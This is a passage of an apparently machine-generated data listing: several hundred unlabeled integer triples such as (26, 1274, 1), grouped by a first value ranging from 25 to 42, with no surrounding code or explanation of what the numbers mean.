(25, 1374, 7),
(25, 4458, 7),
(26, 793, 1),
(26, 797, 1),
(26, 805, 1),
(26, 1031, 1),
(26, 1032, 1),
(26, 1271, 1),
(26, 1274, 1),
(26, 1275, 1),
(26, 1276, 1),
(26, 1277, 1),
(26, 1278, 1),
(26, 1279, 1),
(26, 1280, 1),
(26, 1281, 1),
(26, 1282, 1),
(26, 1283, 1),
(26, 1284, 1),
(26, 1285, 1),
(26, 1286, 1),
(26, 1287, 1),
(26, 1288, 1),
(26, 1289, 1),
(26, 1290, 1),
(26, 1291, 1),
(26, 1292, 1),
(26, 1293, 1),
(26, 1294, 1),
(26, 1295, 1),
(26, 1296, 1),
(26, 1297, 1),
(26, 1298, 1),
(26, 1299, 1),
(26, 1381, 1),
(26, 1890, 1),
(26, 2306, 1),
(26, 2948, 1),
(26, 3562, 1),
(26, 3565, 1),
(26, 4027, 1),
(26, 4043, 1),
(26, 5084, 1),
(26, 5085, 1),
(26, 5086, 1),
(26, 5087, 1),
(26, 5088, 1),
(26, 5089, 1),
(26, 5091, 1),
(26, 5092, 1),
(26, 8999, 1),
(26, 9000, 1),
(26, 9001, 1),
(26, 9003, 1),
(26, 9004, 1),
(26, 9005, 1),
(26, 9006, 1),
(26, 9007, 1),
(26, 9008, 1),
(26, 9494, 1),
(26, 14220, 1),
(26, 14221, 1),
(26, 14701, 1),
(26, 14824, 1),
(26, 15049, 1),
(26, 15051, 1),
(26, 15052, 1),
(26, 15053, 1),
(26, 15054, 1),
(26, 15055, 1),
(26, 15056, 1),
(26, 15057, 1),
(26, 15058, 1),
(26, 15059, 1),
(26, 15060, 1),
(26, 15061, 1),
(26, 15062, 1),
(26, 15063, 1),
(26, 15064, 1),
(26, 15065, 1),
(26, 15066, 1),
(26, 15067, 1),
(26, 16407, 1),
(26, 16408, 1),
(26, 16409, 1),
(26, 16410, 1),
(26, 16411, 1),
(26, 16412, 1),
(26, 16413, 1),
(26, 16415, 1),
(26, 16416, 1),
(26, 16417, 1),
(26, 16418, 1),
(26, 16419, 1),
(26, 16420, 1),
(26, 16538, 1),
(26, 45232, 1),
(26, 52266, 1),
(26, 55590, 1),
(26, 55591, 1),
(26, 816, 2),
(26, 817, 2),
(26, 818, 2),
(26, 819, 2),
(26, 820, 2),
(26, 821, 2),
(26, 822, 2),
(26, 823, 2),
(26, 824, 2),
(26, 825, 2),
(26, 826, 2),
(26, 827, 2),
(26, 828, 2),
(26, 829, 2),
(26, 1300, 2),
(26, 1301, 2),
(26, 3577, 2),
(26, 3579, 2),
(26, 3580, 2),
(26, 3581, 2),
(26, 3582, 2),
(26, 3583, 2),
(26, 3584, 2),
(26, 3585, 2),
(26, 3586, 2),
(26, 3587, 2),
(26, 3588, 2),
(26, 3589, 2),
(26, 773, 3),
(26, 795, 3),
(26, 830, 3),
(26, 3578, 3),
(26, 3590, 3),
(26, 798, 6),
(26, 1269, 6),
(26, 1270, 6),
(26, 3547, 6),
(26, 3564, 6),
(26, 3848, 6),
(26, 18265, 6),
(26, 774, 7),
(26, 3548, 9),
(27, 786, 1),
(27, 797, 1),
(27, 1012, 1),
(27, 1013, 1),
(27, 1032, 1),
(27, 1035, 1),
(27, 1036, 1),
(27, 1037, 1),
(27, 1271, 1),
(27, 1300, 1),
(27, 1301, 1),
(27, 1375, 1),
(27, 1376, 1),
(27, 1377, 1),
(27, 1378, 1),
(27, 1379, 1),
(27, 1380, 1),
(27, 1381, 1),
(27, 1890, 1),
(27, 2298, 1),
(27, 2306, 1),
(27, 2569, 1),
(27, 2948, 1),
(27, 3547, 1),
(27, 3549, 1),
(27, 3561, 1),
(27, 3564, 1),
(27, 3573, 1),
(27, 3849, 1),
(27, 3850, 1),
(27, 3851, 1),
(27, 3852, 1),
(27, 3853, 1),
(27, 3854, 1),
(27, 3855, 1),
(27, 3856, 1),
(27, 3857, 1),
(27, 3858, 1),
(27, 3859, 1),
(27, 3860, 1),
(27, 3861, 1),
(27, 3862, 1),
(27, 3863, 1),
(27, 3864, 1),
(27, 3865, 1),
(27, 3866, 1),
(27, 3867, 1),
(27, 3868, 1),
(27, 3869, 1),
(27, 3870, 1),
(27, 3871, 1),
(27, 3872, 1),
(27, 3873, 1),
(27, 3874, 1),
(27, 3875, 1),
(27, 3876, 1),
(27, 3877, 1),
(27, 3878, 1),
(27, 3879, 1),
(27, 3880, 1),
(27, 3881, 1),
(27, 3882, 1),
(27, 3883, 1),
(27, 3884, 1),
(27, 3885, 1),
(27, 3886, 1),
(27, 3887, 1),
(27, 3888, 1),
(27, 3889, 1),
(27, 3890, 1),
(27, 4034, 1),
(27, 4037, 1),
(27, 4040, 1),
(27, 4047, 1),
(27, 4049, 1),
(27, 4170, 1),
(27, 4172, 1),
(27, 4200, 1),
(27, 4321, 1),
(27, 4330, 1),
(27, 4335, 1),
(27, 4459, 1),
(27, 4460, 1),
(27, 4461, 1),
(27, 4462, 1),
(27, 4463, 1),
(27, 4464, 1),
(27, 4465, 1),
(27, 4466, 1),
(27, 4467, 1),
(27, 4469, 1),
(27, 4470, 1),
(27, 4471, 1),
(27, 4472, 1),
(27, 4473, 1),
(27, 4474, 1),
(27, 4475, 1),
(27, 4476, 1),
(27, 4477, 1),
(27, 5228, 1),
(27, 5229, 1),
(27, 5231, 1),
(27, 5232, 1),
(27, 5236, 1),
(27, 5237, 1),
(27, 5238, 1),
(27, 5239, 1),
(27, 5240, 1),
(27, 5241, 1),
(27, 5242, 1),
(27, 5243, 1),
(27, 5244, 1),
(27, 5245, 1),
(27, 5246, 1),
(27, 5247, 1),
(27, 5248, 1),
(27, 5249, 1),
(27, 8999, 1),
(27, 9000, 1),
(27, 9001, 1),
(27, 9002, 1),
(27, 9003, 1),
(27, 9004, 1),
(27, 9005, 1),
(27, 9006, 1),
(27, 9007, 1),
(27, 9008, 1),
(27, 10307, 1),
(27, 14707, 1),
(27, 15298, 1),
(27, 15448, 1),
(27, 15449, 1),
(27, 15495, 1),
(27, 15496, 1),
(27, 15497, 1),
(27, 15498, 1),
(27, 15499, 1),
(27, 15500, 1),
(27, 45184, 1),
(27, 45185, 1),
(27, 45231, 1),
(27, 45232, 1),
(27, 771, 2),
(27, 774, 2),
(27, 775, 2),
(27, 1374, 2),
(27, 3545, 2),
(27, 4458, 2),
(27, 830, 3),
(27, 3590, 3),
(27, 1371, 6),
(27, 1372, 6),
(27, 1373, 6),
(27, 5226, 6),
(27, 14937, 6),
(27, 45386, 6),
(28, 773, 1),
(28, 776, 1),
(28, 777, 1),
(28, 778, 1),
(28, 779, 1),
(28, 780, 1),
(28, 781, 1),
(28, 782, 1),
(28, 783, 1),
(28, 784, 1),
(28, 785, 1),
(28, 786, 1),
(28, 787, 1),
(28, 788, 1),
(28, 789, 1),
(28, 790, 1),
(28, 791, 1),
(28, 792, 1),
(28, 793, 1),
(28, 794, 1),
(28, 795, 1),
(28, 796, 1),
(28, 798, 1),
(28, 799, 1),
(28, 800, 1),
(28, 801, 1),
(28, 802, 1),
(28, 803, 1),
(28, 804, 1),
(28, 805, 1),
(28, 806, 1),
(28, 807, 1),
(28, 808, 1),
(28, 809, 1),
(28, 810, 1),
(28, 811, 1),
(28, 812, 1),
(28, 813, 1),
(28, 814, 1),
(28, 1032, 1),
(28, 1300, 1),
(28, 1301, 1),
(28, 1381, 1),
(28, 1890, 1),
(28, 2298, 1),
(28, 2306, 1),
(28, 2569, 1),
(28, 2948, 1),
(28, 3550, 1),
(28, 3551, 1),
(28, 3552, 1),
(28, 3553, 1),
(28, 3554, 1),
(28, 3555, 1),
(28, 3556, 1),
(28, 3557, 1),
(28, 3558, 1),
(28, 3559, 1),
(28, 3560, 1),
(28, 3561, 1),
(28, 3562, 1),
(28, 3563, 1),
(28, 3564, 1),
(28, 3566, 1),
(28, 3567, 1),
(28, 3568, 1),
(28, 3569, 1),
(28, 3570, 1),
(28, 3571, 1),
(28, 3572, 1),
(28, 3573, 1),
(28, 3574, 1),
(28, 3575, 1),
(28, 3578, 1),
(28, 3584, 1),
(28, 4027, 1),
(28, 4043, 1),
(28, 8999, 1),
(28, 9000, 1),
(28, 9001, 1),
(28, 9002, 1),
(28, 9003, 1),
(28, 9004, 1),
(28, 9005, 1),
(28, 9007, 1),
(28, 9008, 1),
(28, 14220, 1),
(28, 14230, 1),
(28, 16407, 1),
(28, 16408, 1),
(28, 16409, 1),
(28, 16410, 1),
(28, 16411, 1),
(28, 16412, 1),
(28, 16413, 1),
(28, 16416, 1),
(28, 16417, 1),
(28, 16418, 1),
(28, 16419, 1),
(28, 16420, 1),
(28, 16421, 1),
(28, 16960, 1),
(28, 797, 2),
(28, 3565, 2),
(28, 830, 3),
(28, 3590, 3),
(28, 772, 6),
(28, 774, 6),
(28, 775, 6),
(28, 1377, 6),
(28, 1559, 6),
(28, 3546, 6),
(28, 3547, 6),
(28, 3549, 6),
(28, 771, 7),
(28, 3545, 7),
(28, 3548, 7),
(29, 778, 1),
(29, 785, 1),
(29, 788, 1),
(29, 791, 1),
(29, 802, 1),
(29, 803, 1),
(29, 804, 1),
(29, 815, 1),
(29, 1015, 1),
(29, 1029, 1),
(29, 1030, 1),
(29, 1031, 1),
(29, 1032, 1),
(29, 1033, 1),
(29, 1034, 1),
(29, 1035, 1),
(29, 1036, 1),
(29, 1037, 1),
(29, 1039, 1),
(29, 1048, 1),
(29, 1049, 1),
(29, 1050, 1),
(29, 1051, 1),
(29, 1305, 1),
(29, 1373, 1),
(29, 1381, 1),
(29, 1382, 1),
(29, 1383, 1),
(29, 1384, 1),
(29, 1385, 1),
(29, 1386, 1),
(29, 1387, 1),
(29, 1388, 1),
(29, 1389, 1),
(29, 1390, 1),
(29, 1391, 1),
(29, 1396, 1),
(29, 1746, 1),
(29, 1748, 1),
(29, 3555, 1),
(29, 3557, 1),
(29, 3571, 1),
(29, 3873, 1),
(29, 4170, 1),
(29, 4655, 1),
(29, 5236, 1),
(29, 6562, 1),
(29, 6566, 1),
(29, 6832, 1),
(29, 6840, 1),
(29, 14220, 1),
(29, 14701, 1),
(29, 14702, 1),
(29, 14817, 1),
(29, 14825, 1),
(29, 14935, 1),
(29, 14936, 1),
(29, 14937, 1),
(29, 14938, 1),
(29, 14939, 1),
(29, 14940, 1),
(29, 14941, 1),
(29, 14942, 1),
(29, 16408, 1),
(29, 16409, 1),
(29, 17345, 1),
(29, 20111, 1),
(29, 22927, 1),
(29, 22928, 1),
(29, 22929, 1),
(29, 22930, 1),
(29, 22931, 1),
(29, 22932, 1),
(29, 3577, 2),
(29, 3578, 2),
(29, 3579, 2),
(29, 3580, 2),
(29, 3582, 2),
(29, 3584, 2),
(29, 3587, 2),
(29, 3589, 2),
(29, 4475, 2),
(29, 4476, 2),
(29, 4477, 2),
(29, 6680, 2),
(29, 10223, 2),
(29, 10224, 2),
(29, 10225, 2),
(29, 10226, 2),
(29, 10227, 2),
(29, 10228, 2),
(29, 795, 3),
(29, 816, 3),
(29, 817, 3),
(29, 818, 3),
(29, 819, 3),
(29, 820, 3),
(29, 821, 3),
(29, 822, 3),
(29, 823, 3),
(29, 825, 3),
(29, 826, 3),
(29, 827, 3),
(29, 828, 3),
(29, 829, 3),
(29, 830, 3),
(29, 1047, 3),
(29, 1747, 3),
(29, 3548, 3),
(29, 3590, 3),
(29, 773, 4),
(29, 772, 6),
(29, 1012, 6),
(29, 1270, 6),
(29, 1377, 6),
(29, 3546, 6),
(29, 3848, 6),
(29, 22745, 6),
(29, 1374, 7),
(29, 4458, 7),
(29, 14707, 7),
(30, 791, 1),
(30, 804, 1),
(30, 1011, 1),
(30, 1017, 1),
(30, 1019, 1),
(30, 1020, 1),
(30, 1022, 1),
(30, 1029, 1),
(30, 1031, 1),
(30, 1038, 1),
(30, 1041, 1),
(30, 1381, 1),
(30, 1873, 1),
(30, 1874, 1),
(30, 1875, 1),
(30, 1876, 1),
(30, 1877, 1),
(30, 1878, 1),
(30, 1879, 1),
(30, 1882, 1),
(30, 1883, 1),
(30, 1884, 1),
(30, 1885, 1),
(30, 1886, 1),
(30, 1887, 1),
(30, 1888, 1),
(30, 1889, 1),
(30, 1891, 1),
(30, 1892, 1),
(30, 2298, 1),
(30, 2306, 1),
(30, 2569, 1),
(30, 2948, 1),
(30, 3555, 1),
(30, 3565, 1),
(30, 3571, 1),
(30, 6562, 1),
(30, 8999, 1),
(30, 9000, 1),
(30, 9001, 1),
(30, 9003, 1),
(30, 9004, 1),
(30, 9005, 1),
(30, 9007, 1),
(30, 9008, 1),
(30, 10026, 1),
(30, 14230, 1),
(30, 14696, 1),
(30, 14697, 1),
(30, 14698, 1),
(30, 14701, 1),
(30, 14815, 1),
(30, 14816, 1),
(30, 14817, 1),
(30, 14818, 1),
(30, 14819, 1),
(30, 14820, 1),
(30, 14821, 1),
(30, 14822, 1),
(30, 14823, 1),
(30, 14824, 1),
(30, 14825, 1),
(30, 14826, 1),
(30, 14827, 1),
(30, 14828, 1),
(30, 14829, 1),
(30, 14830, 1),
(30, 16407, 1),
(30, 16408, 1),
(30, 16409, 1),
(30, 16410, 1),
(30, 16411, 1),
(30, 16412, 1),
(30, 16413, 1),
(30, 16415, 1),
(30, 16416, 1),
(30, 16417, 1),
(30, 16419, 1),
(30, 16420, 1),
(30, 16421, 1),
(30, 17731, 1),
(30, 773, 2),
(30, 797, 2),
(30, 816, 2),
(30, 817, 2),
(30, 818, 2),
(30, 819, 2),
(30, 820, 2),
(30, 821, 2),
(30, 822, 2),
(30, 823, 2),
(30, 825, 2),
(30, 826, 2),
(30, 827, 2),
(30, 828, 2),
(30, 829, 2),
(30, 1032, 2),
(30, 1035, 2),
(30, 1036, 2),
(30, 1037, 2),
(30, 1047, 2),
(30, 1747, 2),
(30, 1880, 2),
(30, 1881, 2),
(30, 1890, 2),
(30, 3577, 2),
(30, 3579, 2),
(30, 3580, 2),
(30, 3582, 2),
(30, 3584, 2),
(30, 3587, 2),
(30, 3589, 2),
(30, 4475, 2),
(30, 4476, 2),
(30, 4477, 2),
(30, 6557, 2),
(30, 6558, 2),
(30, 6680, 2),
(30, 10223, 2),
(30, 10224, 2),
(30, 10225, 2),
(30, 10226, 2),
(30, 10227, 2),
(30, 10228, 2),
(30, 14220, 2),
(30, 795, 3),
(30, 830, 3),
(30, 3578, 3),
(30, 3590, 3),
(30, 772, 6),
(30, 775, 6),
(30, 1377, 6),
(30, 1871, 6),
(30, 1872, 6),
(30, 3546, 6),
(30, 3549, 6),
(30, 6550, 6),
(30, 1012, 7),
(30, 14707, 7),
(30, 3548, 9),
(31, 778, 1),
(31, 787, 1),
(31, 788, 1),
(31, 791, 1),
(31, 797, 1),
(31, 805, 1),
(31, 1014, 1),
(31, 1015, 1),
(31, 1016, 1),
(31, 1017, 1),
(31, 1018, 1),
(31, 1019, 1),
(31, 1020, 1),
(31, 1021, 1),
(31, 1022, 1),
(31, 1023, 1),
(31, 1024, 1),
(31, 1025, 1),
(31, 1026, 1),
(31, 1027, 1),
(31, 1028, 1),
(31, 1029, 1),
(31, 1030, 1),
(31, 1031, 1),
(31, 1033, 1),
(31, 1034, 1),
(31, 1038, 1),
(31, 1039, 1),
(31, 1040, 1),
(31, 1041, 1),
(31, 1042, 1),
(31, 1043, 1),
(31, 1044, 1),
(31, 1045, 1),
(31, 1046, 1),
(31, 1381, 1),
(31, 1890, 1),
(31, 2298, 1),
(31, 2306, 1),
(31, 2569, 1),
(31, 2948, 1),
(31, 3556, 1),
(31, 3557, 1),
(31, 3565, 1),
(31, 5237, 1),
(31, 6427, 1),
(31, 6431, 1),
(31, 6562, 1),
(31, 8999, 1),
(31, 9000, 1),
(31, 9001, 1),
(31, 9003, 1),
(31, 9004, 1),
(31, 9005, 1),
(31, 9007, 1),
(31, 9008, 1),
(31, 9892, 1),
(31, 14230, 1),
(31, 14693, 1),
(31, 14694, 1),
(31, 14695, 1),
(31, 14696, 1),
(31, 14697, 1),
(31, 14698, 1),
(31, 14699, 1),
(31, 14700, 1),
(31, 14701, 1),
(31, 14702, 1),
(31, 14703, 1),
(31, 14704, 1),
(31, 14705, 1),
(31, 14706, 1),
(31, 14708, 1),
(31, 14709, 1),
(31, 14710, 1),
(31, 16407, 1),
(31, 16408, 1),
(31, 16409, 1),
(31, 16410, 1),
(31, 16411, 1),
(31, 16412, 1),
(31, 16413, 1),
(31, 16416, 1),
(31, 16417, 1),
(31, 16419, 1),
(31, 16420, 1),
(31, 16421, 1),
(31, 17873, 1),
(31, 773, 2),
(31, 816, 2),
(31, 817, 2),
(31, 818, 2),
(31, 819, 2),
(31, 820, 2),
(31, 821, 2),
(31, 822, 2),
(31, 823, 2),
(31, 825, 2),
(31, 826, 2),
(31, 827, 2),
(31, 828, 2),
(31, 829, 2),
(31, 1032, 2),
(31, 1035, 2),
(31, 1036, 2),
(31, 1037, 2),
(31, 1047, 2),
(31, 1747, 2),
(31, 3577, 2),
(31, 3579, 2),
(31, 3580, 2),
(31, 3582, 2),
(31, 3587, 2),
(31, 3589, 2),
(31, 4475, 2),
(31, 4476, 2),
(31, 4477, 2),
(31, 6680, 2),
(31, 10223, 2),
(31, 10224, 2),
(31, 10225, 2),
(31, 10226, 2),
(31, 10227, 2),
(31, 10228, 2),
(31, 14220, 2),
(31, 795, 3),
(31, 830, 3),
(31, 3578, 3),
(31, 3584, 3),
(31, 3590, 3),
(31, 772, 6),
(31, 1013, 6),
(31, 1377, 6),
(31, 3546, 6),
(31, 5229, 6),
(31, 1011, 7),
(31, 1012, 7),
(31, 6419, 7),
(31, 14707, 7),
(31, 3548, 8),
(36, 778, 1),
(36, 788, 1),
(36, 797, 1),
(36, 803, 1),
(36, 806, 1),
(36, 1035, 1),
(36, 1036, 1),
(36, 1037, 1),
(36, 1381, 1),
(36, 1880, 1),
(36, 1881, 1),
(36, 1890, 1),
(36, 2281, 1),
(36, 2282, 1),
(36, 2283, 1),
(36, 2284, 1),
(36, 2285, 1),
(36, 2286, 1),
(36, 2287, 1),
(36, 2288, 1),
(36, 2289, 1),
(36, 2290, 1),
(36, 2291, 1),
(36, 2292, 1),
(36, 2293, 1),
(36, 2294, 1),
(36, 2295, 1),
(36, 2296, 1),
(36, 2297, 1),
(36, 2299, 1),
(36, 2306, 1),
(36, 2318, 1),
(36, 2319, 1),
(36, 2320, 1),
(36, 2569, 1),
(36, 2948, 1),
(36, 3557, 1),
(36, 3563, 1),
(36, 3565, 1),
(36, 3570, 1),
(36, 4193, 1),
(36, 4475, 1),
(36, 4476, 1),
(36, 6557, 1),
(36, 6558, 1),
(36, 6821, 1),
(36, 6854, 1),
(36, 6855, 1),
(36, 8999, 1),
(36, 9000, 1),
(36, 9001, 1),
(36, 9003, 1),
(36, 9004, 1),
(36, 9005, 1),
(36, 9007, 1),
(36, 9008, 1),
(36, 9592, 1),
(36, 14215, 1),
(36, 14216, 1),
(36, 14217, 1),
(36, 14218, 1),
(36, 14219, 1),
(36, 14221, 1),
(36, 14222, 1),
(36, 14223, 1),
(36, 14224, 1),
(36, 14225, 1),
(36, 14226, 1),
(36, 14227, 1),
(36, 14228, 1),
(36, 14229, 1),
(36, 14231, 1),
(36, 16407, 1),
(36, 16408, 1),
(36, 16409, 1),
(36, 16410, 1),
(36, 16411, 1),
(36, 16412, 1),
(36, 16413, 1),
(36, 16415, 1),
(36, 16416, 1),
(36, 16417, 1),
(36, 16419, 1),
(36, 16420, 1),
(36, 16421, 1),
(36, 17235, 1),
(36, 17588, 1),
(36, 795, 2),
(36, 816, 2),
(36, 817, 2),
(36, 818, 2),
(36, 819, 2),
(36, 820, 2),
(36, 821, 2),
(36, 822, 2),
(36, 825, 2),
(36, 826, 2),
(36, 827, 2),
(36, 828, 2),
(36, 829, 2),
(36, 1032, 2),
(36, 1047, 2),
(36, 1747, 2),
(36, 2298, 2),
(36, 3577, 2),
(36, 3579, 2),
(36, 3580, 2),
(36, 3582, 2),
(36, 3587, 2),
(36, 3589, 2),
(36, 6680, 2),
(36, 10223, 2),
(36, 10224, 2),
(36, 10225, 2),
(36, 10226, 2),
(36, 10227, 2),
(36, 10228, 2),
(36, 14220, 2),
(36, 14230, 2),
(36, 773, 3),
(36, 823, 3),
(36, 830, 3),
(36, 3578, 3),
(36, 3584, 3),
(36, 3590, 3),
(36, 772, 6),
(36, 775, 6),
(36, 1012, 6),
(36, 2280, 6),
(36, 3546, 6),
(36, 3549, 6),
(36, 3868, 6),
(36, 4319, 6),
(36, 14707, 6),
(36, 791, 7),
(36, 3548, 9),
(37, 778, 1),
(37, 788, 1),
(37, 797, 1),
(37, 803, 1),
(37, 806, 1),
(37, 1035, 1),
(37, 1036, 1),
(37, 1037, 1),
(37, 1381, 1),
(37, 1880, 1),
(37, 1881, 1),
(37, 1890, 1),
(37, 2281, 1),
(37, 2282, 1),
(37, 2283, 1),
(37, 2284, 1),
(37, 2285, 1),
(37, 2286, 1),
(37, 2287, 1),
(37, 2288, 1),
(37, 2289, 1),
(37, 2290, 1),
(37, 2291, 1),
(37, 2292, 1),
(37, 2293, 1),
(37, 2294, 1),
(37, 2295, 1),
(37, 2296, 1),
(37, 2297, 1),
(37, 2299, 1),
(37, 2306, 1),
(37, 2318, 1),
(37, 2319, 1),
(37, 2320, 1),
(37, 2569, 1),
(37, 2948, 1),
(37, 3557, 1),
(37, 3563, 1),
(37, 3565, 1),
(37, 3570, 1),
(37, 4193, 1),
(37, 4475, 1),
(37, 4476, 1),
(37, 6557, 1),
(37, 6558, 1),
(37, 6821, 1),
(37, 6854, 1),
(37, 6855, 1),
(37, 8999, 1),
(37, 9000, 1),
(37, 9001, 1),
(37, 9003, 1),
(37, 9004, 1),
(37, 9005, 1),
(37, 9007, 1),
(37, 9008, 1),
(37, 9592, 1),
(37, 14215, 1),
(37, 14216, 1),
(37, 14217, 1),
(37, 14218, 1),
(37, 14219, 1),
(37, 14221, 1),
(37, 14222, 1),
(37, 14223, 1),
(37, 14224, 1),
(37, 14225, 1),
(37, 14226, 1),
(37, 14227, 1),
(37, 14228, 1),
(37, 14229, 1),
(37, 14231, 1),
(37, 16407, 1),
(37, 16408, 1),
(37, 16409, 1),
(37, 16410, 1),
(37, 16411, 1),
(37, 16412, 1),
(37, 16413, 1),
(37, 16415, 1),
(37, 16416, 1),
(37, 16417, 1),
(37, 16419, 1),
(37, 16420, 1),
(37, 16421, 1),
(37, 17235, 1),
(37, 17588, 1),
(37, 795, 2),
(37, 816, 2),
(37, 817, 2),
(37, 818, 2),
(37, 819, 2),
(37, 820, 2),
(37, 821, 2),
(37, 822, 2),
(37, 825, 2),
(37, 826, 2),
(37, 827, 2),
(37, 828, 2),
(37, 829, 2),
(37, 1032, 2),
(37, 1047, 2),
(37, 1747, 2),
(37, 2298, 2),
(37, 3577, 2),
(37, 3579, 2),
(37, 3580, 2),
(37, 3582, 2),
(37, 3587, 2),
(37, 3589, 2),
(37, 6680, 2),
(37, 10223, 2),
(37, 10224, 2),
(37, 10225, 2),
(37, 10226, 2),
(37, 10227, 2),
(37, 10228, 2),
(37, 14220, 2),
(37, 14230, 2),
(37, 773, 3),
(37, 823, 3),
(37, 830, 3),
(37, 3578, 3),
(37, 3584, 3),
(37, 3590, 3),
(37, 772, 6),
(37, 775, 6),
(37, 1012, 6),
(37, 1377, 6),
(37, 2280, 6),
(37, 2408, 6),
(37, 2409, 6),
(37, 3546, 6),
(37, 3549, 6),
(37, 3868, 6),
(37, 4319, 6),
(37, 5232, 6),
(37, 14707, 6),
(37, 22187, 6),
(37, 22188, 6),
(37, 791, 7),
(37, 3548, 9),
(39, 773, 1),
(39, 791, 1),
(39, 812, 1),
(39, 824, 1),
(39, 1271, 1),
(39, 1381, 1),
(39, 2298, 1),
(39, 2299, 1),
(39, 2545, 1),
(39, 2547, 1),
(39, 2561, 1),
(39, 2562, 1),
(39, 2563, 1),
(39, 2566, 1),
(39, 2567, 1),
(39, 2568, 1),
(39, 2569, 1),
(39, 2570, 1),
(39, 2571, 1),
(39, 2572, 1),
(39, 2573, 1),
(39, 2574, 1),
(39, 2575, 1),
(39, 2576, 1),
(39, 2577, 1),
(39, 39221, 1),
(39, 39222, 1),
(39, 39227, 1),
(39, 39228, 1),
(39, 55901, 1),
(39, 55902, 1),
(39, 2564, 2),
(39, 2565, 2),
(39, 14228, 2),
(39, 15495, 2),
(39, 15908, 2),
(39, 16207, 2),
(39, 16413, 2),
(39, 20795, 2),
(39, 20797, 2),
(39, 20802, 2),
(39, 20944, 2),
(39, 20945, 2),
(39, 39374, 2),
(39, 39375, 2),
(39, 39380, 2),
(39, 39381, 2),
(39, 830, 3),
(39, 3590, 3),
(39, 2544, 6),
(39, 20783, 6),
(39, 20793, 6),
(39, 20794, 6),
(39, 2539, 7),
(39, 2540, 7),
(39, 788, 8),
(39, 2543, 8),
(39, 3557, 8),
(39, 20775, 8),
(39, 20784, 8),
(41, 776, 1),
(41, 777, 1),
(41, 778, 1),
(41, 779, 1),
(41, 780, 1),
(41, 781, 1),
(41, 782, 1),
(41, 783, 1),
(41, 784, 1),
(41, 785, 1),
(41, 786, 1),
(41, 787, 1),
(41, 788, 1),
(41, 789, 1),
(41, 790, 1),
(41, 791, 1),
(41, 792, 1),
(41, 793, 1),
(41, 794, 1),
(41, 796, 1),
(41, 798, 1),
(41, 799, 1),
(41, 800, 1),
(41, 801, 1),
(41, 802, 1),
(41, 803, 1),
(41, 804, 1),
(41, 805, 1),
(41, 806, 1),
(41, 807, 1),
(41, 808, 1),
(41, 809, 1),
(41, 810, 1),
(41, 811, 1),
(41, 812, 1),
(41, 813, 1),
(41, 814, 1),
(41, 1032, 1),
(41, 1300, 1),
(41, 1301, 1),
(41, 1381, 1),
(41, 1890, 1),
(41, 2298, 1),
(41, 2306, 1),
(41, 2569, 1),
(41, 2948, 1),
(41, 3550, 1),
(41, 3551, 1),
(41, 3552, 1),
(41, 3553, 1),
(41, 3554, 1),
(41, 3555, 1),
(41, 3556, 1),
(41, 3557, 1),
(41, 3558, 1),
(41, 3559, 1),
(41, 3560, 1),
(41, 3561, 1),
(41, 3562, 1),
(41, 3563, 1),
(41, 3564, 1),
(41, 3566, 1),
(41, 3567, 1),
(41, 3568, 1),
(41, 3569, 1),
(41, 3570, 1),
(41, 3571, 1),
(41, 3572, 1),
(41, 3573, 1),
(41, 3574, 1),
(41, 3575, 1),
(41, 4027, 1),
(41, 4043, 1),
(41, 8999, 1),
(41, 9000, 1),
(41, 9001, 1),
(41, 9003, 1),
(41, 9004, 1),
(41, 9005, 1),
(41, 9006, 1),
(41, 9007, 1),
(41, 9008, 1),
(41, 9123, 1),
(41, 14220, 1),
(41, 14230, 1),
(41, 16407, 1),
(41, 16408, 1),
(41, 16409, 1),
(41, 16410, 1),
(41, 16411, 1),
(41, 16412, 1),
(41, 16413, 1),
(41, 16416, 1),
(41, 16417, 1),
(41, 16418, 1),
(41, 16419, 1),
(41, 16420, 1),
(41, 16421, 1),
(41, 17101, 1),
(41, 797, 2),
(41, 816, 2),
(41, 817, 2),
(41, 818, 2),
(41, 819, 2),
(41, 820, 2),
(41, 821, 2),
(41, 822, 2),
(41, 823, 2),
(41, 824, 2),
(41, 825, 2),
(41, 826, 2),
(41, 827, 2),
(41, 828, 2),
(41, 829, 2),
(41, 3565, 2),
(41, 3577, 2),
(41, 3579, 2),
(41, 3580, 2),
(41, 3581, 2),
(41, 3582, 2),
(41, 3583, 2),
(41, 3585, 2),
(41, 3586, 2),
(41, 3587, 2),
(41, 3588, 2),
(41, 3589, 2),
(41, 795, 3),
(41, 830, 3),
(41, 3578, 3),
(41, 3584, 3),
(41, 3590, 3),
(41, 772, 6),
(41, 774, 6),
(41, 1270, 6),
(41, 3546, 6),
(41, 3547, 6),
(41, 3848, 6),
(41, 771, 7),
(41, 3545, 7),
(41, 773, 9),
(41, 3548, 9),
(42, 778, 1),
(42, 793, 1),
(42, 798, 1),
(42, 1029, 1),
(42, 1032, 1),
(42, 1298, 1),
(42, 1381, 1),
(42, 1393, 1),
(42, 1889, 1),
(42, 1890, 1),
(42, 2298, 1),
(42, 2306, 1),
(42, 2569, 1),
(42, 2937, 1),
(42, 2948, 1),
(42, 3562, 1),
(42, 3563, 1),
(42, 3564, 1),
(42, 3992, 1),
(42, 3993, 1),
(42, 3994, 1),
(42, 3995, 1),
(42, 3996, 1),
(42, 3997, 1),
(42, 3998, 1),
(42, 3999, 1),
(42, 4000, 1),
(42, 4001, 1),
(42, 4002, 1),
(42, 4003, 1),
(42, 4004, 1),
(42, 4005, 1),
(42, 4006, 1),
(42, 4036, 1),
(42, 4043, 1),
(42, 8999, 1),
(42, 9000, 1),
(42, 9001, 1),
(42, 9003, 1),
(42, 9004, 1),
(42, 9005, 1),
(42, 9006, 1),
(42, 9007, 1),
(42, 9008, 1),
(42, 9377, 1),
(42, 14220, 1),
(42, 14230, 1),
(42, 14942, 1),
(42, 15791, 1),
(42, 15792, 1),
(42, 15793, 1),
(42, 15794, 1),
(42, 15795, 1),
(42, 15796, 1),
(42, 15797, 1),
(42, 15798, 1),
(42, 15799, 1),
(42, 15800, 1),
(42, 15801, 1),
(42, 15802, 1),
(42, 15803, 1),
(42, 15804, 1),
(42, 16407, 1),
(42, 16408, 1),
(42, 16409, 1),
(42, 16410, 1),
(42, 16411, 1),
(42, 16412, 1),
(42, 16413, 1),
(42, 16414, 1),
(42, 16415, 1),
(42, 16416, 1),
(42, 16417, 1),
(42, 16418, 1),
(42, 16419, 1),
(42, 16420, 1),
(42, 16421, 1),
(42, 797, 2),
(42, 816, 2),
(42, 817, 2),
(42, 818, 2),
(42, 819, 2),
(42, 820, 2),
(42, 821, 2),
(42, 822, 2),
(42, 823, 2),
(42, 824, 2),
(42, 825, 2),
(42, 826, 2),
(42, 827, 2),
(42, 828, 2),
(42, 829, 2),
(42, 1300, 2),
